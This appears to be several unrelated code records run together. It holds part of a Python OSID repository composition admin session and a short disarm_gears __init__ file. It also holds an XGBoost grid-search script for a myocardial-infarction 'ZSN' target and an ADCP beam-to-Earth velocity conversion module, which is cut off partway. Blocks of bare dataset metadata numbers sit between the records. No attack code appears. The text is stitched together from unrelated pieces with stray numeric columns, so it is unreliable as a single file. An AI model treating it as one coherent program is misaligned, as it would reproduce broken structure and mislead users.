raise: NotFound - ``composition_id`` is not found
raise: NullArgument - ``composition_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.get_resource_form_for_update_template
return self._provider_session.get_composition_form_for_update(composition_id)
def _get_composition_id_with_enclosure(self, enclosure_id):
"""Create an Composition with an enclosed foreign object.
return: (osid.id.Id) - the id of the new Composition
"""
return self._provider_session._get_composition_id_with_enclosure(enclosure_id)
@utilities.arguments_not_none
def update_composition(self, composition_form):
"""Updates an existing composition.
arg: composiiton_form (osid.repository.CompositionForm): the
form containing the elements to be updated
raise: IllegalState - ``composition_form`` already used in an
update transaction
raise: InvalidArgument - the form contains an invalid value
raise: NullArgument - ``composition_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``composition_form`` did not originate
from ``get_composition_form_for_update()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.update_resource_template
return self._provider_session.update_composition(composition_form)
def can_delete_compositions(self):
"""Tests if this user can delete ``Compositions``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known deleting a
``Composition`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may not wish to offer
delete operations to unauthorized users.
return: (boolean) - ``false`` if ``Composition`` deletion is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_create_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def delete_composition(self, composition_id):
"""Deletes a ``Composition``.
arg: composition_id (osid.id.Id): the ``Id`` of the
``Composition`` to remove
raise: NotFound - ``composition_id`` not found
raise: NullArgument - ``composition_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.delete_resource_template
self._provider_session.delete_composition(composition_id)
    @utilities.arguments_not_none
    def delete_composition_node(self, composition_id):
        """Deletes a ``Composition`` and all contained children.

        arg:    composition_id (osid.id.Id): the ``Id`` of the
                ``Composition`` to remove
        raise:  NotFound - ``composition_id`` not found
        raise:  NullArgument - ``composition_id`` is ``null``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # Recursive (node) deletion is not supported by this implementation.
        raise Unimplemented()
    @utilities.arguments_not_none
    def add_composition_child(self, composition_id, child_composition_id):
        """Adds a composition to a parent composition.

        arg:    composition_id (osid.id.Id): the ``Id`` of a parent
                ``Composition``
        arg:    child_composition_id (osid.id.Id): the ``Id`` of a child
                ``Composition``
        raise:  AlreadyExists - ``child_composition_id`` is already a
                child of ``composition_id``
        raise:  NotFound - ``composition_id`` or
                ``child_composition_id`` is not found
        raise:  NullArgument - ``composition_id`` or
                ``child_composition_id`` is ``null``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # Composition hierarchy editing is not supported by this implementation.
        raise Unimplemented()
    @utilities.arguments_not_none
    def remove_composition_child(self, composition_id, child_composition_id):
        """Removes a composition from a parent composition.

        arg:    composition_id (osid.id.Id): the ``Id`` of a parent
                ``Composition``
        arg:    child_composition_id (osid.id.Id): the ``Id`` of a child
                ``Composition``
        raise:  NotFound - ``composition_id`` or
                ``child_composition_id`` is not found or not related
        raise:  NullArgument - ``composition_id`` or
                ``child_composition_id`` is ``null``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # Composition hierarchy editing is not supported by this implementation.
        raise Unimplemented()
    def can_manage_composition_aliases(self):
        """Tests if this user can manage ``Id`` aliases for ``Compositions``.

        A return of true does not guarantee successful authorization. A
        return of false indicates that it is known changing an alias
        will result in a ``PermissionDenied``. This is intended as a
        hint to an application that may opt not to offer alias
        operations to an unauthorized user.

        return: (boolean) - ``false`` if ``Composition`` aliasing is not
                authorized, ``true`` otherwise
        *compliance: mandatory -- This method must be implemented.*

        """
        # Aliasing is not supported by this implementation, so unlike the
        # other can_*() hints this one raises rather than returning True.
        raise Unimplemented()
    @utilities.arguments_not_none
    def alias_composition(self, composition_id, alias_id):
        """Adds an ``Id`` to a ``Composition`` for the purpose of creating compatibility.

        The primary ``Id`` of the ``Composition`` is determined by the
        provider. The new ``Id`` is an alias to the primary ``Id``. If
        the alias is a pointer to another composition, it is reassigned
        to the given composition ``Id``.

        arg:    composition_id (osid.id.Id): the ``Id`` of a
                ``Composition``
        arg:    alias_id (osid.id.Id): the alias ``Id``
        raise:  AlreadyExists - ``alias_id`` is in use as a primary
                ``Id``
        raise:  NotFound - ``composition_id`` not found
        raise:  NullArgument - ``composition_id`` or ``alias_id`` is
                ``null``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # Id aliasing is not supported by this implementation.
        raise Unimplemented()
| 43.778574
| 191
| 0.674325
| 14,751
| 128,315
| 5.717172
| 0.03776
| 0.022909
| 0.038454
| 0.048486
| 0.889036
| 0.861242
| 0.832049
| 0.794353
| 0.773413
| 0.751749
| 0
| 0.000125
| 0.249784
| 128,315
| 2,930
| 192
| 43.793515
| 0.875945
| 0.683303
| 0
| 0.45339
| 0
| 0
| 0.010338
| 0.00468
| 0
| 0
| 0
| 0
| 0
| 1
| 0.311441
| false
| 0.016949
| 0.016949
| 0.004237
| 0.608051
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
52f947a52c5a8af23c6da096efcf1e559760f853
| 97
|
py
|
Python
|
disarm_gears/__init__.py
|
disarm-platform/disarm-gears
|
d9f747687e632102a4ef2821b33936daacb01b6c
|
[
"MIT"
] | null | null | null |
disarm_gears/__init__.py
|
disarm-platform/disarm-gears
|
d9f747687e632102a4ef2821b33936daacb01b6c
|
[
"MIT"
] | 11
|
2019-02-28T00:18:47.000Z
|
2020-02-22T20:36:00.000Z
|
disarm_gears/__init__.py
|
disarm-platform/disarm-gears
|
d9f747687e632102a4ef2821b33936daacb01b6c
|
[
"MIT"
] | null | null | null |
from disarm_gears import frames
from disarm_gears import util
from disarm_gears import r_plugins
| 24.25
| 34
| 0.876289
| 16
| 97
| 5.0625
| 0.5
| 0.37037
| 0.555556
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123711
| 97
| 3
| 35
| 32.333333
| 0.952941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
eabccb0f31742b5a46fcdce44c458c4d6cc4ee4e
| 3,160
|
py
|
Python
|
inf_classif_analysis/tree_based_class_dummy/ZSN_variable/xgboost_ZSN.py
|
Marco-Ametrano/myocardal_infarction_class
|
d2fb9d4d6643d0b836ffdb94a32911eb4d68c390
|
[
"MIT"
] | null | null | null |
inf_classif_analysis/tree_based_class_dummy/ZSN_variable/xgboost_ZSN.py
|
Marco-Ametrano/myocardal_infarction_class
|
d2fb9d4d6643d0b836ffdb94a32911eb4d68c390
|
[
"MIT"
] | null | null | null |
inf_classif_analysis/tree_based_class_dummy/ZSN_variable/xgboost_ZSN.py
|
Marco-Ametrano/myocardal_infarction_class
|
d2fb9d4d6643d0b836ffdb94a32911eb4d68c390
|
[
"MIT"
] | null | null | null |
# XGBoost models for the ZSN target.
# NOTE(review): this script depends on names defined elsewhere (xgboost, np,
# GridSearchCV, classification_report, X_train, X_test, Y_ZSN_train,
# Y_ZSN_test, ZSN) -- presumably imported/prepared in a companion script or
# notebook; verify before running standalone. Bare expressions such as
# `importances` and `np.where(...)` only display output in a notebook and are
# no-ops as a plain script.

# --- Model 1: no class re-weighting (scale_pos_weight left at default) ---
XGBclassifier= xgboost.XGBClassifier(random_state=22)
XGBclassifier.fit(X_train, Y_ZSN_train.values.ravel())
# Feature selection: keep columns whose importance exceeds 0.02.
importances=XGBclassifier.feature_importances_; importances
np.where(importances>0.02)
# NOTE(review): hard-coded column indices assume a fixed feature order in
# X_train/X_test -- confirm they match the np.where() output above.
X_train_rid = X_train.iloc[:, [ 0, 9, 24, 27, 33, 41, 43, 44, 46, 53, 78, 85, 87,
91, 92, 93, 97, 98, 101]]
X_test_rid = X_test.iloc[:, [ 0, 9, 24, 27, 33, 41, 43, 44, 46, 53, 78, 85, 87,
91, 92, 93, 97, 98, 101]]
# Hyperparameter grid searched with 3-fold CV on the reduced feature set.
XGBparams = dict(eta=[0.05, 0.10, 0.15, 0.20], gamma=[ 0.0, 0.1, 0.2 , 0.3],
max_depth=[ 3, 4, 5, 6, 8, 10], min_child_weight=[ 1, 3, 5],
colsample_bytree=[ 0.3, 0.4, 0.5])
grid_search_XGB = GridSearchCV(XGBclassifier, XGBparams,verbose=1, cv=3, n_jobs=-1)
grid_search_XGB.fit(X_train_rid,Y_ZSN_train.values.ravel())
print(grid_search_XGB.best_params_)
# Final model refit with the (manually transcribed) best parameters.
# NOTE(review): objective='multi:softmax' with num_class=12 looks inconsistent
# with a binary ZSN target (and with using scale_pos_weight below, which is a
# binary-classification parameter) -- confirm the intended objective.
XGBclassifier=xgboost.XGBClassifier(base_score=0.5, booster='gbtree', colsample_bylevel=1,
colsample_bytree=0.4, gamma=0.2, eta=0.05,
max_delta_step=0, max_depth=5, min_child_weight=1, missing=None,
n_estimators=100, n_jobs=1, nthread=None,
objective='multi:softmax',num_class=12, random_state=22, reg_alpha=0,
reg_lambda=1, scale_pos_weight=1, seed=None, silent=True,
subsample=1)
XGBclassifier.fit(X_train_rid,Y_ZSN_train.values.ravel())
y_train_pred=XGBclassifier.predict(X_train_rid)
print(classification_report(Y_ZSN_train, y_train_pred))
y_test_pred = XGBclassifier.predict(X_test_rid)
print(classification_report(Y_ZSN_test, y_test_pred))

# --- Model 2: with class re-weighting (scale_pos_weight=2.99, presumably the
# negative/positive class ratio from ZSN.value_counts() -- verify) ---
ZSN.value_counts()
XGBclassifier= xgboost.XGBClassifier(random_state=22, scale_pos_weight=2.99)
XGBclassifier.fit(X_train, Y_ZSN_train.values.ravel())
# Feature selection repeated; the selected columns differ from Model 1.
importances=XGBclassifier.feature_importances_; importances
np.where(importances>0.02)
X_train_rid = X_train.iloc[:, [ 0, 1, 9, 24, 27, 40, 41, 44, 46, 49, 53, 85, 86, 89, 91, 92, 93,
98, 99]]
X_test_rid = X_test.iloc[:, [ 0, 1, 9, 24, 27, 40, 41, 44, 46, 49, 53, 85, 86, 89, 91, 92, 93,
98, 99]]
XGBparams = dict(eta=[0.05, 0.10, 0.15, 0.20], gamma=[ 0.0, 0.1, 0.2 , 0.3],
max_depth=[ 3, 4, 5, 6, 8, 10], min_child_weight=[ 1, 3, 5],
colsample_bytree=[ 0.3, 0.4, 0.5])
grid_search_XGB = GridSearchCV(XGBclassifier, XGBparams,verbose=1, cv=3, n_jobs=-1)
grid_search_XGB.fit(X_train_rid,Y_ZSN_train.values.ravel())
print(grid_search_XGB.best_params_)
XGBclassifier=xgboost.XGBClassifier(base_score=0.5, booster='gbtree', colsample_bylevel=1,
colsample_bytree=0.4, gamma=0.0, eta=0.05,
max_delta_step=0, max_depth=8, min_child_weight=1, missing=None,
n_estimators=100, n_jobs=1, nthread=None,
objective='multi:softmax',num_class=12, random_state=22, reg_alpha=0,
reg_lambda=1, scale_pos_weight= 2.99, seed=None, silent=True,
subsample=1)
XGBclassifier.fit(X_train_rid,Y_ZSN_train.values.ravel())
y_train_pred=XGBclassifier.predict(X_train_rid)
print(classification_report(Y_ZSN_train, y_train_pred))
y_test_pred = XGBclassifier.predict(X_test_rid)
print(classification_report(Y_ZSN_test, y_test_pred))
| 48.615385
| 99
| 0.701899
| 540
| 3,160
| 3.846296
| 0.205556
| 0.034665
| 0.034665
| 0.043332
| 0.966779
| 0.95715
| 0.912855
| 0.900337
| 0.900337
| 0.874338
| 0
| 0.10721
| 0.152848
| 3,160
| 64
| 100
| 49.375
| 0.668659
| 0.018671
| 0
| 0.754717
| 0
| 0
| 0.012262
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.075472
| 0
| 0.075472
| 0.113208
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eabeecb2672aca0bfed8a97e3c444cb395ff0722
| 24,621
|
py
|
Python
|
dewaveADCP/beam2earth.py
|
apaloczy/dewaveADCP
|
f37702905ccaeb5a4ecc738cba9ee46cd76cd03f
|
[
"MIT"
] | 4
|
2019-09-25T21:39:50.000Z
|
2022-02-16T19:11:21.000Z
|
dewaveADCP/beam2earth.py
|
apaloczy/dewaveADCP
|
f37702905ccaeb5a4ecc738cba9ee46cd76cd03f
|
[
"MIT"
] | null | null | null |
dewaveADCP/beam2earth.py
|
apaloczy/dewaveADCP
|
f37702905ccaeb5a4ecc738cba9ee46cd76cd03f
|
[
"MIT"
] | 1
|
2021-12-10T12:32:26.000Z
|
2021-12-10T12:32:26.000Z
|
# Functions for converting ADCP velocities in beam coordinates to instrument- or Earth-coordinates.
# Direct translation of functions in the 'ADCPtools' MATLAB
# package (https://github.com/apaloczy/ADCPtools).
import numpy as np
from scipy.interpolate import interp1d
from .utils import sind, cosd, near, nearfl
######################
#### 4-beam Janus ####
######################
def janus2xyz(b1, b2, b3, b4, theta, r=None, ptch=None, roll=None, binmaptype=None, use3beamsol=True, verbose=True):
    """
    USAGE
    -----
    vx, vy, vz = janus2xyz(b1, b2, b3, b4, theta, r=None, ptch=None, roll=None, binmaptype=None, use3beamsol=True, verbose=True)

    Convert along-beam velocities (b1..b4, [nz x nt]) from a 4-beam Janus ADCP
    to instrument coordinates (Vx, Vy, Vz).

    theta, ptch, roll must be in RADIANS.

    r, ptch and roll are required only when bin-mapping is requested via
    `binmaptype` ('linear' or nearest-neighbor).
    """
    Nz, Nt = b1.shape
    if binmaptype is not None:
        assert r is not None, "Must provide r if using bin-mapping."
        assert ptch is not None, "Must provide pitch if using bin-mapping."
        assert roll is not None, "Must provide roll if using bin-mapping."
        if verbose:
            print('Mapping bins to horizontal planes using *%s* interpolation.'%binmaptype)
        b1, b2, b3, b4 = binmap(b1, b2, b3, b4, r, theta, ptch, roll, how=binmaptype)
    else:
        if verbose:
            print('Bin-mapping NOT applied.')
    if use3beamsol:
        # Fill cells where exactly one beam is NaN using the error-velocity=0
        # constraint.
        b1, b2, b3, b4 = janus3beamsol(b1, b2, b3, b4)
    B = np.stack((b1, b2, b3, b4), axis=-1)  # (Nz, Nt, 4)
    uvfac = 1/(2*np.sin(theta))
    wfac = 1/(4*np.cos(theta))  # For w derived from beams 1-4.
    # Rows of A give (unscaled) Vx, Vy and the beam-1-4 average w.
    #               b1  b2  b3  b4
    A = np.array([[-1,  1,  0,  0],
                  [ 0,  0, -1,  1],
                  [-1, -1, -1, -1]])
    if verbose:
        print('Calculating Vx, Vy, Vz for %d bins x %d records.'%(Nz, Nt))
    # Vectorized form of np.matmul(A, B[nz, nt, :]) over all (nz, nt):
    # one broadcast matrix product instead of Nz*Nt Python-level matmul calls.
    vxyz = B @ A.T  # (Nz, Nt, 3)
    Vx = vxyz[:, :, 0]*uvfac
    Vy = vxyz[:, :, 1]*uvfac
    Vz = vxyz[:, :, 2]*wfac
    return Vx, Vy, Vz
def janus2earth(head, ptch, roll, theta, b1, b2, b3, b4, r=None, gimbaled=True, binmaptype=None, use3beamsol=True, verbose=True):
    """
    USAGE
    -----
    [u, v, w] = janus2earth(head, ptch, roll, theta, b1, b2, b3, b4, r=None, gimbaled=True, binmaptype=None, use3beamsol=True, verbose=True)

    Calculates Earth velocities (u,v,w) = (east,north,up) from beam-referenced velocity time series
    from a 4-beam Janus ADCP, (e.g., Appendix A of Dewey & Stringer (2007), Equations A3-A11).

    nz, nt, nb = number of vertical bins, data records, beams.

    ============================================================================
    For TRDI instruments, call function like this:
    u, v, w = janus2earth(head, ptch, roll, theta, b1, b2, b3, b4)

    For Nortek instruments, call function like this:
    u, v, w = janus2earth(head-90, roll, -ptch, theta, -b1, -b3, -b4, -b2)
    ============================================================================

    TRDI CONVENTION:
    ================
    * Velocity toward transducers' faces: POSITIVE
    * Clockwise PITCH (tilt about x-AXIS): POSITIVE (beam 3 higher than beam 4)
    * Clockwise ROLL (tilt about y-AXIS): POSITIVE (beam 2 higher than beam 1)
    * Heading increases CLOCKWISE from the *Y-AXIS*.

          ^ positive y axis, psi = 0
          |
          3
          |
          |
          |
    2 --- O --- 1 ---> positive x axis, psi = +90
          |
          |
          |
          4

    NORTEK CONVENTION:
    ==================
    * Velocity toward transducers' faces: NEGATIVE
    * Counter-clockwise PITCH (tilt about y-AXIS, equivalent to -ROLL in the TRDI convention): POSITIVE (beam 1 higher than beam 3)
    * Clockwise ROLL (tilt about x-AXIS, equivalent to PITCH in the TRDI convention): POSITIVE (beam 4 higher than beam 2)
    Heading increases CLOCKWISE from the *X-AXIS*.

          ^ positive y axis, psi = -90
          |
          4
          |
          |
          |
    3 --- O --- 1 ---> positive x axis, psi = 0
          |
          |
          |
          2

    INPUTS
    ------
    b1, b2, b3, b4     [nz -by- nt] matrices of along-beam velocity components.
    head, ptch, roll   [nt] vectors with (time-dependent) heading, pitch
                       and roll angles, following D&S2007's notation.
    theta              Beam angle measured from the vertical.
                       *For RDI Sentinel V and Nortek Signature: 25.
    gimbaled           [True or False] Whether the ADCP was deployed with a gimbaled roll sensor
                       (default true). Applies the correction to the raw pitch angle
                       if the pitch/roll sensors were mounted rigidly to the
                       instrument ('Gimbaled'==false), or the correction to the raw
                       heading angle if the ADCP was mounted on a gimbal (Dewey &
                       Stringer, 2007; Lohrmann et al., 1990).
    binmaptype         [None or 'linear' or 'nn']
                       Whether to map the beam velocities to fixed horizontal
                       planes with linear interpolation ('linear') or nearest-neighbor
                       interpolation ('nearest') prior to converting
                       to instrument coordinates (Ott, 2002; Dewey & Stringer, 2007).
                       *The default is to NOT perform any bin mapping.
    use3beamsol        [True or False] Whether to use three-beam solutions when exactly one beam has
                       no data in one cell.

    OUTPUTS
    -------
    [u, v, w]          [east, north, up] components of Earth-referenced velocity vector.
    """
    nz, nt = b1.shape # Number of vertical bins and records in the time series.
    # All input angles arrive in degrees here and are converted to radians.
    d2r = np.pi/180
    head = head*d2r
    ptch = ptch*d2r
    roll = roll*d2r
    theta = theta*d2r
    # Time-dependent angles (heading, pitch and roll).
    Sph1 = np.sin(head)
    Sph2 = np.sin(ptch)
    Sph3 = np.sin(roll)
    Cph1 = np.cos(head)
    Cph2 = np.cos(ptch)
    Cph3 = np.cos(roll)
    if gimbaled: # Correct heading (D&S 2007, eq. A2).
        if verbose:
            print('Gimbaled instrument case.')
        Sph2Sph3 = Sph2*Sph3
        head = head + np.arcsin( Sph2Sph3/np.sqrt(Cph2**2 + Sph2Sph3**2) )
        # Heading changed above, so its sine/cosine must be recomputed.
        Sph1 = np.sin(head)
        Cph1 = np.cos(head)
    else: # Correct pitch (D&S 2007, eq. A1; Lohrmann et al. 1990, eq. A1).
        if verbose:
            print('Fixed instrument case.')
        ptch = np.arcsin( (Sph2*Cph3)/np.sqrt(1 - (Sph2*Sph3)**2) )
        # Pitch changed above, so its sine/cosine must be recomputed.
        Sph2 = np.sin(ptch)
        Cph2 = np.cos(ptch)
    # Convert instrument-referenced velocities
    # to Earth-referenced velocities.
    # cx*, cy*, cz* are the entries of the instrument-to-Earth rotation.
    cx1 = Cph1*Cph3 + Sph1*Sph2*Sph3
    cx2 = Sph1*Cph3 - Cph1*Sph2*Sph3
    cx3 = Cph2*Sph3
    cy1 = Sph1*Cph2
    cy2 = Cph1*Cph2
    cy3 = Sph2
    cz1 = Cph1*Sph3 - Sph1*Sph2*Cph3
    cz2 = Sph1*Sph3 + Cph1*Sph2*Cph3
    cz3 = Cph2*Cph3
    # Convert beam-referenced velocities to instrument-referenced velocities.
    # NOTE: The convention used here (positive x axis = horizontally away from beam 1) and
    # positive y axis = horizontally away from beam 3) is not
    # the same as the one used by the instrument's firmware if
    # the coordinate transformation mode is set to "instrument
    # coordinates" before deployment.
    Vx, Vy, Vz = janus2xyz(b1, b2, b3, b4, theta, r=r, ptch=ptch, roll=roll, binmaptype=binmaptype, use3beamsol=use3beamsol, verbose=verbose)
    u = +Vx*cx1 + Vy*cy1 + Vz*cz1
    v = -Vx*cx2 + Vy*cy2 - Vz*cz2
    w = -Vx*cx3 + Vy*cy3 + Vz*cz3
    return u, v, w
######################
#### 5-beam Janus ####
######################
def janus2xyz5(b1, b2, b3, b4, b5, theta, r=None, ptch=None, roll=None, binmaptype=None, use3beamsol=True, verbose=True):
    """
    USAGE
    -----
    vx, vy, vz, vz5 = janus2xyz5(b1, b2, b3, b4, b5, theta, r=None, ptch=None, roll=None, binmaptype=None, use3beamsol=True, verbose=True)

    Convert along-beam velocities (b1..b5, [nz x nt]) from a 5-beam Janus ADCP
    to instrument coordinates. Vz comes from the average of beams 1-4; Vz5 is
    the independent estimate from the vertical (5th) beam.

    theta, ptch, roll must be in RADIANS.
    """
    Nz, Nt = b1.shape
    if binmaptype is not None:
        assert r is not None, "Must provide r if using bin-mapping."
        assert ptch is not None, "Must provide pitch if using bin-mapping."
        assert roll is not None, "Must provide roll if using bin-mapping."
        if verbose:
            print('Mapping bins to horizontal planes using *%s* interpolation.'%binmaptype)
        b1, b2, b3, b4, b5 = binmap5(b1, b2, b3, b4, b5, r, theta, ptch, roll, how=binmaptype)
    else:
        if verbose:
            print('Bin-mapping NOT applied.')
    if use3beamsol:
        # Three-beam solutions apply to the four Janus beams only.
        b1, b2, b3, b4 = janus3beamsol(b1, b2, b3, b4)
    B = np.stack((b1, b2, b3, b4, b5), axis=-1)  # (Nz, Nt, 5)
    uvfac = 1/(2*np.sin(theta))
    wfac = 1/(4*np.cos(theta))  # For w derived from beams 1-4.
    # Rows of A give (unscaled) Vx, Vy, the beam-1-4 average w, and -b5.
    #               b1  b2  b3  b4  b5
    A = np.array([[-1,  1,  0,  0,  0],
                  [ 0,  0, -1,  1,  0],
                  [-1, -1, -1, -1,  0],
                  [ 0,  0,  0,  0, -1]])
    if verbose:
        print('Calculating Vx, Vy, Vz, Vz5 for %d bins x %d records.'%(Nz, Nt))
    # Vectorized form of np.matmul(A, B[nz, nt, :]) over all (nz, nt):
    # one broadcast matrix product instead of Nz*Nt Python-level matmul calls.
    vxyz = B @ A.T  # (Nz, Nt, 4)
    Vx = vxyz[:, :, 0]*uvfac
    Vy = vxyz[:, :, 1]*uvfac
    Vz = vxyz[:, :, 2]*wfac
    Vz5 = vxyz[:, :, 3]
    return Vx, Vy, Vz, Vz5
def janus2earth5(head, ptch, roll, theta, b1, b2, b3, b4, b5, r=None, gimbaled=True, binmaptype=None, uvwbeam5=True, use3beamsol=True, verbose=True):
    """
    USAGE
    -----
    u, v, w, w5 = janus2earth5(head, ptch, roll, theta, b1, b2, b3, b4, b5, r=None, gimbaled=True, binmaptype=None, uvwbeam5=True, use3beamsol=True, verbose=True)

    Calculates Earth velocities (u,v,w) = (east,north,up) from beam-referenced velocity time series
    from a 5-beam Janus ADCP, (e.g., Appendix A of Dewey & Stringer (2007), Equations A3-A11).

    nz, nt, nb = number of vertical bins, data records, beams.

    ============================================================================
    For TRDI instruments, call function like this:
    u, v, w = janus2earth(head, ptch, roll, theta, b1, b2, b3, b4)

    For Nortek instruments, call function like this:
    u, v, w = janus2earth(head-90, roll, -ptch, theta, -b1, -b3, -b4, -b2)
    ============================================================================

    TRDI CONVENTION:
    ================
    * Velocity toward transducers' faces: POSITIVE
    * Clockwise PITCH (tilt about x-AXIS): POSITIVE (beam 3 higher than beam 4)
    * Clockwise ROLL (tilt about y-AXIS): POSITIVE (beam 2 higher than beam 1)
    * Heading increases CLOCKWISE from the *Y-AXIS*.

          ^ positive y axis, psi = 0
          |
          3
          |
          |
          |
    2 --- O --- 1 ---> positive x axis, psi = +90
          |
          |
          |
          4

    NORTEK CONVENTION:
    ==================
    * Velocity toward transducers' faces: NEGATIVE
    * Counter-clockwise PITCH (tilt about y-AXIS, equivalent to -ROLL in the TRDI convention): POSITIVE (beam 1 higher than beam 3)
    * Clockwise ROLL (tilt about x-AXIS, equivalent to PITCH in the TRDI convention): POSITIVE (beam 4 higher than beam 2)
    Heading increases CLOCKWISE from the *X-AXIS*.

          ^ positive y axis, psi = -90
          |
          4
          |
          |
          |
    3 --- O --- 1 ---> positive x axis, psi = 0
          |
          |
          |
          2

    INPUTS
    ------
    b1, b2, b3, b4, b5  [nz -by- nt] matrices of along-beam velocity components.
    head, ptch, roll    [nt] vectors with (time-dependent) heading, pitch
                        and roll angles, following D&S2007's notation.
    theta               Beam angle measured from the vertical.
                        *For RDI Sentinel V and Nortek Signature: 25.
    uvwBeam5            [True or False] whether to calculate [u, v, w] using the independent information
                        from beam 5 (defaults true). If false, the usual four-beam
                        solution using w derived from beams 1-4 is calculated.
    gimbaled            [True or False] Whether the ADCP was deployed with a gimbaled roll sensor
                        (default true). Applies the correction to the raw pitch angle
                        if the pitch/roll sensors were mounted rigidly to the
                        instrument ('Gimbaled'==false), or the correction to the raw
                        heading angle if the ADCP was mounted on a gimbal (Dewey &
                        Stringer, 2007; Lohrmann et al., 1990).
    binmaptype          [None or 'linear' or 'nn']
                        Whether to map the beam velocities to fixed horizontal
                        planes with linear interpolation ('linear') or nearest-neighbor
                        interpolation ('nearest') prior to converting
                        to instrument coordinates (Ott, 2002; Dewey & Stringer, 2007).
                        *The default is to NOT perform any bin mapping.
    use3beamsol         [True or False] Whether to use three-beam solutions when exactly one beam has
                        no data in one cell.

    OUTPUTS
    -------
    [u, v, w, w5]       [east, north, up, up-(from vertical beam only)] components
                        of Earth-referenced velocity vector.
    """
    nz, nt = b1.shape # Number of vertical bins and records in the time series.
    # All input angles arrive in degrees here and are converted to radians.
    d2r = np.pi/180
    head = head*d2r
    ptch = ptch*d2r
    roll = roll*d2r
    theta = theta*d2r
    # Time-dependent angles (heading, pitch and roll).
    Sph1 = np.sin(head)
    Sph2 = np.sin(ptch)
    Sph3 = np.sin(roll)
    Cph1 = np.cos(head)
    Cph2 = np.cos(ptch)
    Cph3 = np.cos(roll)
    if gimbaled: # Correct heading (D&S 2007, eq. A2).
        if verbose:
            print('Gimbaled instrument case.')
        Sph2Sph3 = Sph2*Sph3
        head = head + np.arcsin( Sph2Sph3/np.sqrt(Cph2**2 + Sph2Sph3**2) )
        # Heading changed above, so its sine/cosine must be recomputed.
        Sph1 = np.sin(head)
        Cph1 = np.cos(head)
    else: # Correct pitch (D&S 2007, eq. A1; Lohrmann et al. 1990, eq. A1).
        if verbose:
            print('Fixed instrument case.')
        ptch = np.arcsin( (Sph2*Cph3)/np.sqrt(1 - (Sph2*Sph3)**2) )
        # Pitch changed above, so its sine/cosine must be recomputed.
        Sph2 = np.sin(ptch)
        Cph2 = np.cos(ptch)
    # Convert instrument-referenced velocities
    # to Earth-referenced velocities.
    # Option 1: Classic four-beam solution.
    # Option 2: five-beam solution for [u, v, w].
    # cx*, cy*, cz* are the entries of the instrument-to-Earth rotation.
    cx1 = Cph1*Cph3 + Sph1*Sph2*Sph3
    cx2 = Sph1*Cph3 - Cph1*Sph2*Sph3
    cx3 = Cph2*Sph3
    cy1 = Sph1*Cph2
    cy2 = Cph1*Cph2
    cy3 = Sph2
    cz1 = Cph1*Sph3 - Sph1*Sph2*Cph3
    cz2 = Sph1*Sph3 + Cph1*Sph2*Cph3
    cz3 = Cph2*Cph3
    # Convert beam-referenced velocities to instrument-referenced velocities.
    # NOTE: The convention used here (positive x axis = horizontally away from beam 1) and
    # positive y axis = horizontally away from beam 3) is not
    # the same as the one used by the instrument's firmware if
    # the coordinate transformation mode is set to "instrument
    # coordinates" before deployment.
    Vx, Vy, Vz, Vz5 = janus2xyz5(b1, b2, b3, b4, b5, theta, r=r, ptch=ptch, roll=roll, binmaptype=binmaptype, use3beamsol=use3beamsol, verbose=verbose)
    w5 = Vz5*cz3 # w from beam 5 only.
    if uvwbeam5:
        if verbose:
            print('Using vertical beam for [u, v, w].')
        u = +Vx*cx1 + Vy*cy1 + Vz5*cz1
        v = -Vx*cx2 + Vy*cy2 - Vz5*cz2
        w = -Vx*cx3 + Vy*cy3 + w5
    else:
        if verbose:
            print('Using only beams 1-4 for [u, v, w].')
        u = +Vx*cx1 + Vy*cy1 + Vz*cz1
        v = -Vx*cx2 + Vy*cy2 - Vz*cz2
        w = -Vx*cx3 + Vy*cy3 + Vz*cz3
    return u, v, w, w5
def binmap(b1, b2, b3, b4, r, theta, ptch, roll, how='linear'):
    """
    USAGE
    -----
    b1m, b2m, b3m, b4m = binmap(b1, b2, b3, b4, r, theta, ptch, roll, how='linear')

